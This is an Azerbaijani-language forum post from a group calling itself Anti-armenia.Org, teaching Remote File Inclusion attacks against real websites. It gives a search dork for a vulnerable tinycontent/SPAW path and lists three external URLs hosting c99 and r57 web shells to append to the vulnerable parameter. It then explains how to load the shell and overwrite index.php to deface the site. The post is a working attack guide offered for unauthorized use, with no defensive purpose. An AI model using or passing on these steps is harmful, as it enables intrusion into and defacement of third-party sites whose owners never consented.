Salamlar Hamıya... Mən Avatar Fearless və bu gün Anti-armenia.Org -da Digər Adıyla AA Team -da 100-cü mövzumu paylaşıram və Çox Sevinirəm... Necə 1 xəəbr yerləşdirim Bilmədim Amma Əlimdən gəldiyi qədər Yazıb Kömək Olmağa Çalışacıyam... Bu Günkü mövzum Remote File Inclusion Metod attack... Video Dərslik Hazırlamaq Fikrinə Düşdüm amma Bəzi User-lər Video-nu öz adlarına götürürlər... Yazıdada Eynidir Alıntı Olduğun qeyd eləmirlər Nəysə .Deməli Belə İlk Öncə biz açıqlı Sayt Tapmalıyıq Bunun üçün yahoo.com Google.Com Yandex.Ru mail.Ru və s. axtarış yerlərində Allİnurl Dorku axtaracayıq... Hansın ? Deməli Bizim Açığımız
Kod:
/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=
Və Bu Dorku Axtarış Sistemlərində Axtarsaq tapmaq çətin olacaq o səbəbdən biz sadəcə /modules/tinycontent/ axtaracağıq... Qabağına İnurl Artırmaq Lazımdır yada olar... Fərq Etmir Axtarırıq Və Qabağımıza Çıxan Saytlarda Bunlar olacar - /modules/tinycontent/ və yani saytinadi.com/modules/tinycontent/index.php?id=4 burda index.php?id=4 əvəzinə başqasıda ola bilər... yada sadəcə saytinadı.com/modules/tinycontent/ və bundan sonra biz /modules/tinycontent/-i silib /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root= artıracağıq yani saytınadı.com/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root= olacaq bundan sonra isə bizə sadəcə 1 c99.txt? lazım olacaq yada r57.txt? mən sizə 3 ədəd verirəm
Kod:
http://www.freewebs.com/seriouserror/c99.txt?
http://bizimcafe.t35.com/c99.txt?
http://r57.li/dtoolpro.txt?
Və Bunlardan 1-in seçirik Və URL-imizin axırına artırırıq...yani saytınadı.com/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebs.com/seriouserror/c99.txt? olacaq və Bu yollada avtomatik olaraq sayta shell yüklənmiş olur yada saytı Shell ilə açırıq... Burdan sonrası asanddır... Sadəcə İndex.Php faylını eidtləyirik və ora öz İndex.html-in code-lərin atırıq...1 Şeydə qeyd edim açıq həmişə /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root= olmur RFİ açıqlarıda sayılır məsələn error.php?error= burada hərhansı birin qoyuruq bu qədər... Ümüdvaramki Anladınız. Nəsə Sualınız olsa buyurun... Nəsə Səhvim olsa da Buyurun... 100-cü xəbərim umudvaram sizə anlayış gətirib... Qeyd etdiyim kimi Video özüm qoymadımki sonra öz adlarına götürməsinlər... Əməyə Hörmət !